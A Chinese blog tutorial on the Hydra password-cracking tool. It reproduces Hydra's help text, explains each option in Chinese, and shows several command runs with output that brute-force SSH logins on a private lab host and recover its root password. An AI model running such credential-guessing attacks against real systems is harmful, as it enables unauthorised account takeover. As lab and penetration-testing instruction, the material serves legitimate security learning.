hydra----密码爆破

2023-05-18 14:40:44 浏览数 (1)

简介

hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,kali系统自带这款工具。

详解

使用hydra -h查看帮助文档:

代码语言:javascript复制
┌──(root㉿kali)-[~]
└─# hydra -h
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login pass for each attempt / debug mode 
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Bash

参数讲解

-R

恢复先前中止/崩溃的会话

-I

忽略现有还原文件(不要等待10秒)

-S

执行SSL连接

-s PORT

如果服务在不同的默认端口上,请在此处定义

-l LOGIN or -L FILE

使用LOGIN名称登录,或从FILE加载多个登录

-p PASS or -P FILE

尝试密码PASS,或从FILE加载多个密码

-x MIN:MAX:CHARSET

密码生成前,键入“-x-h”以获取帮助

-y

禁止在bruteforce中使用符号,请参见上文

-r

对选项-x使用非随机洗牌方法

-e nsr

n-尝试空密码,s-尝试登录名为密码,r-反转登录名为密码

-u

循环用户,而不是密码(有效!用-x表示)

-C FILE

冒号分隔的“login:pass”格式,而不是-L/-P选项

-M FILE

要攻击的服务器列表,每行一个条目,“:”指定端口

-o FILE

将找到的登录名/密码对写入FILE而不是stdout

-b FORMAT

指定-o FILE的格式:text(默认)、json、jsonv1

-f/-F

找到登录/传递对时退出(-M:-f每个主机,-f全局)

-t TASKS

运行TASKS每个目标并行连接数(默认值:16)

-T TASKS

运行TASKS整体并行连接(对于-M,默认值:64)

-w/-W TIME

响应等待时间(32)/每个线程连接之间的时间(0)

-c TIME

所有线程上每次登录尝试的时间等待时间(强制执行-t 1)

-4/-6

使用IPv4(默认)/IPv6地址(始终放在[]中,也放在-M中)

-v/-v/-d verbose mode/

显示每次尝试的登录名 密码/调试模式

-O

使用旧SSL v2和v3

-K

不重做失败的尝试(适用于-M大规模扫描)

-q

不打印有关连接错误的消息

-U

服务模块使用详细信息

-m

特定于模块的OPT选项,有关信息,请参阅-U输出

-h

更多命令行选项(COMPLETE HELP)

server

目标:DNS、IP或192.168.0.0/24(此选项或-M选项)

service

要破解的服务(有关支持的协议,请参见下文)

OPT

某些服务模块支持附加输入(-U表示模块帮助)

实例

代码语言:javascript复制
┌──(root㉿kali)-[~]
└─# hydra -l root -p toor -vV 192.168.154.131 ssh   #-vV输出详细爆破过程,[ATTEMPT]开头行则是尝试的登录密码对
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 03:03:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.154.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.154.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.154.131:22
[ATTEMPT] target 192.168.154.131 - login "root" - pass "toor" - 1 of 1 [child 0] (0/0)
[22][ssh] host: 192.168.154.131   login: root   password: toor
[STATUS] attack finished for 192.168.154.131 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 03:03:40
                                                                                                                
┌──(root㉿kali)-[~]
└─# hydra -l root -p toor -e n -vV 192.168.154.131 ssh  #注意-e n参数,尝试密码为空的登录密码对,因为ssh可以设置无密码登录,出现了两行以[ATTEMPT]开头的
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 03:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking ssh://192.168.154.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.154.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.154.131:22
[ATTEMPT] target 192.168.154.131 - login "root" - pass "" - 1 of 2 [child 0] (0/0)
[ATTEMPT] target 192.168.154.131 - login "root" - pass "toor" - 2 of 2 [child 1] (0/0)
[STATUS] attack finished for 192.168.154.131 (waiting for children to complete tests)
[22][ssh] host: 192.168.154.131   login: root   password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 03:03:51
                                                                                                                
┌──(root㉿kali)-[~]
└─# hydra -l root -p toor -e ns -vV 192.168.154.131 ssh  #-e ns,s则是尝试登录名和密码都是登录名
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 03:04:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking ssh://192.168.154.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.154.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.154.131:22
[ATTEMPT] target 192.168.154.131 - login "root" - pass "root" - 1 of 3 [child 0] (0/0)
[ATTEMPT] target 192.168.154.131 - login "root" - pass "" - 2 of 3 [child 1] (0/0)
[ATTEMPT] target 192.168.154.131 - login "root" - pass "toor" - 3 of 3 [child 2] (0/0)
[STATUS] attack finished for 192.168.154.131 (waiting for children to complete tests)
[22][ssh] host: 192.168.154.131   login: root   password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 03:04:05
                                                                                                                
┌──(root㉿kali)-[~]
└─# hydra -l toor -p toor -e nsr -vV 192.168.154.131 ssh  #注意登录名换成了 toor ,观察输出的[ATTEMPT]开头的登录密码对,有一行密码是root,这就是-e r参数,将登录名反转变成密码
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 03:04:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://192.168.154.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://toor@192.168.154.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.154.131:22
[ATTEMPT] target 192.168.154.131 - login "toor" - pass "toor" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target 192.168.154.131 - login "toor" - pass "" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target 192.168.154.131 - login "toor" - pass "root" - 3 of 4 [child 2] (0/0)
[STATUS] attack finished for 192.168.154.131 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 03:04:26

┌──(root㉿kali)-[~]
└─# cat test.txt 
123
root
toor
                                                                                                                
┌──(root㉿kali)-[~]
└─# hydra -L test.txt -P test.txt -vV 192.168.154.131 ssh  #从文件中加载登录名和密码,用笛卡尔积匹配对
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 03:17:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.154.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://123@192.168.154.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.154.131:22
[ATTEMPT] target 192.168.154.131 - login "123" - pass "123" - 1 of 9 [child 0] (0/0)
[ATTEMPT] target 192.168.154.131 - login "123" - pass "root" - 2 of 9 [child 1] (0/0)
[ATTEMPT] target 192.168.154.131 - login "123" - pass "toor" - 3 of 9 [child 2] (0/0)
[ATTEMPT] target 192.168.154.131 - login "root" - pass "123" - 4 of 9 [child 3] (0/0)
[ATTEMPT] target 192.168.154.131 - login "root" - pass "root" - 5 of 9 [child 4] (0/0)
[ATTEMPT] target 192.168.154.131 - login "root" - pass "toor" - 6 of 9 [child 5] (0/0)
[ATTEMPT] target 192.168.154.131 - login "toor" - pass "123" - 7 of 9 [child 6] (0/0)
[ATTEMPT] target 192.168.154.131 - login "toor" - pass "root" - 8 of 9 [child 7] (0/0)
[ATTEMPT] target 192.168.154.131 - login "toor" - pass "toor" - 9 of 9 [child 8] (0/0)
[22][ssh] host: 192.168.154.131   login: root   password: toor
[STATUS] attack finished for 192.168.154.131 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 03:17:48

Bash

结语

好好学习,天天向上!!!

ssh root 登录 服务 连接

0 人点赞